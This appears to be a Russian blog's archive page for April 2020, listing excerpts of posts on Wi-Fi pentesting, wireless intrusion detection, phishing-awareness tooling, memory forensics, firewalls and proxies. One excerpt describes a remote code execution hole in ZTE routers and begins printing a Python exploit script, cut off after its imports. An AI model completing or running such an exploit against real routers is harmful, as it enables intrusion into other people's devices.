Месячные архивы:: Апрель 2020
Для проведения тестирования на проникновения беспроводных сетей отлично подойдет дистрибутив kali linux, содержащий большое количество утилит. Для начала мы проверим доступные сетевые интерфейсы. Сделать это можно командой: iwconfig При этом вы увидите похожую картинку: В данном случае есть 2 доступных сетевых интерфейса, wlan0mon (о режиме мониторинга чуть позже) и wlan1 (wlan0). После это шага есть несколько
Существует много материала про атаки и про защиту в Wi-Fi сетях , но практически нет информации об обнаружении вторжения в беспроводные сети. Данный обзор будет посвящен одной из таких утилит: waidps — установка, настройка и параметры. Waipds — утилита написанная на python. Установка и запуск довольно просты, ничего дополнительно устанавливать не требуется, при дефолтной установке Kali Linux присутствуют все необходимое для этой утилиты.
Уязвимость в ZTE роутерах, доступному по URI router_ip:443/web_shell_cmd.gch. Она заключается в том, что мы посылаем POST-запрос с ошибкой и ее типом, а в ней — код для выполнения. Информация предназначена исключительно для ознакомления. Не нарушайте законодательство. Поехали! import threading import socket import ssl import time import sys info = open(str(sys.argv[1]),'a+') class skid(threading.Thread): def __init__(self, ip): threading.Thread.__init__(self)
Mercure — это инструмент для менеджеров по безопасности, которые хотят учить своих коллег знаниями о фишинге. Что может сделать Mercure: Создание шаблонов электронной почты Создание целевых списков Создание целевых страниц Обрабатывать вложения Давайте следить за панелью кампаний Отслеживание сообщений электронной почты, посещений целевой страницы и выполнения вложений. Расписание кампаний Минимизировать ссылку в шаблонах электронной почты
Что такое форензика памяти? Форензика памяти — это криминалистический анализ дампа памяти компьютера. Его основное применение — расследование сложных компьютерных атак, которые достаточно скрытны, чтобы не оставлять данные на жестком диске компьютера. Следовательно, память (RAM) должна анализироваться на предмет криминалистической информации. Необходимые требования Инструменты:Volatility Redline Caploader Образ:Memory Image В этом руководстве я использую инструменты на
В Windows 10 встроен свой брандмауэр, но в этой статье я расскажу про четыре лучших бесплатных файервола с гораздо более удобным и интуитивным интерфейсом. Важно: после установки какой-либо программы из этой статьи убедитесь, что вы отключили родной брандмауэр Windows, чтобы избежать конфликтов программного обеспечения. 1. Comodo Firewall Бесплатный брандмауэр Comodo — это очень эффективное решение, которое, кроме обычных задач
Различные компании выпускают носители информации, которые получают функцию самоуничтожения прямо из коробки. Решений огромное количество. Есть флешки, которые не хранят никакой информации, но зато могут уничтожить компьютер или ноутбук. Если такую «флешку» положить рядом со своим ноутбуком, и товарищ майор кто-то пожелает быстро проверить, что на ней записано, то она уничтожит и себя, и ноутбук.
Вручную в Windows 10 переключать настройки прокси в браузере достаточно неудобно и медленно. Чтобы сэкономить время, вы можете использовать скрипты. Proxy-сервер — это промежуточный узел между вашим компьютером и интернетом. Фактически, прокси — один из способов обеспечить анонимность и получить доступ к заблокированным сайтам. Не самый надёжный, конечно, но иногда спасающий. Я рассмотрю всего два скрипта, причём
TreeComp – это бесплатная утилита, которая позволяет легко сравнить или синхронизировать файлы между двумя папками. Это очень удобный инструмент, который всегда полезно держать на компьютере. В закладки.
Для людей с небольшими знаниями в области информационной безопасности.Требуется минимальное понимание устройства сетей и используемых в них протоколов. Приветствуется знание UNIX-подобных систем.Если этих знаний нет или их недостаточно, в курсе Вы сможете их получить. Чему Вы научитесь: Узнаете о ключевых сетевых протоколах, принципах работы Узнаете о безопасности или небезопасности тех или иных протоколов, используемых в